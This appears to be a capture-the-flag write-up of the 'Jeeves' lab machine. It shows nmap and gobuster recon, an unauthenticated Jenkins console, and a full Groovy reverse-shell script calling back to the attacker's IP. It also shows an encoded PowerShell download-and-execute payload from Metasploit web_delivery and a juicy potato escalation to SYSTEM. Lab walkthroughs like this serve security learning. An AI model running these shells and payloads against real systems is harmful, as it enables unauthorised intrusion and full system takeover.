Jeeves

Initial nmap

sudo nmap -sS -sV -Pn -n --disable-arp-ping -v -T4 -p- 10.10.10.63

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Dirbusting with Gobuster finds a directory “/askjeeves/” which logs into the console with no credentials.

gobuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt dir -u http://10.10.10.63:50000/ -t 100
http://10.10.10.63:50000/askjeeves/

Reverse shell using a groovy script:

String host="10.10.14.27";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

listening on [any] 4444 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.63] 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke

Listing the available user priviledges finds SeImpersonatePrivilege token is enabled incidating that this system may be vulnerable to a Potato attack:

C:\Users\Administrator\.jenkins>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

Converting shell to meterpreter shell to make for easy potato attack

msf6 > use exploit/multi/script/web_delivery

msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.10.14.27 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.27 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port

Exploit target:

Id Name
-- ----
2 PSH

msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.27:443
[*] Using URL: http://10.10.14.27:8080/7LFZNVikGVnT4
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB1AFAAcQBzAHMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdQBQAHEAcwBzAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdQBQAHEAcwBzAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA3ADoAOAAwADgAMAAvADcATABGAFoATgBWAGkAawBHAFYAbgBUADQALwBSAHAAYQBuADkAMgBqAGkATABSAFEAVQBhAEoAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIANwA6ADgAMAA4ADAALwA3AEwARgBaAE4AVgBpAGsARwBWAG4AVAA0ACcAKQApADsA
msf6 exploit(multi/script/web_delivery) > [*] 10.10.10.63 web_delivery - Delivering AMSI Bypass (1388 bytes)
[*] 10.10.10.63 web_delivery - Delivering Payload (3524 bytes)
[*] Sending stage (175174 bytes) to 10.10.10.63
[*] Meterpreter session 1 opened (10.10.14.27:443 -> 10.10.10.63:49678) at 2021-10-16 01:45:39 -0400

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows JEEVES\kohsuke @ JEEVES 10.10.14.27:443 -> 10.10.10.63:49678 (10.10.10.63)

msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JEEVES\kohsuke
meterpreter >

Metasploits exploit suggestor did not return any results which is weird because I know this machine is vulnerable. Using an offline tool called windows-exploit-suggester.py confirms there is a potential potato attack due to the SeImpersonate token being enabled.

[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation

Back to metasploit to search for Potato attacks:

msf6 post(multi/recon/local_exploit_suggester) > search potato

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/bits_ntlm_token_impersonation 2019-12-06 great Yes SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.
1 exploit/windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC
2 exploit/windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)

No luck with “bits_ntlm_token_impersonation” or “ms16_075_reflection” but juicy potato “ms16_075_reflection_juicy” privilege escalates us to System.

msf6 exploit(windows/local/ms16_075_reflection_juicy) > run

[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 10.10.14.27:5555
[+] Target appears to be vulnerable (Windows 10 (10.0 Build 10586).)
[*] Launching notepad to host the exploit...
[+] Process 2740 launched.
[*] Reflectively injecting the exploit DLL into 2740...
[*] Injecting exploit into 2740...
[*] Exploit injected. Injecting exploit configuration into 2740...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.63
[*] Meterpreter session 2 opened (10.10.14.27:5555 -> 10.10.10.63:49687) at 2021-10-16 02:09:36 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM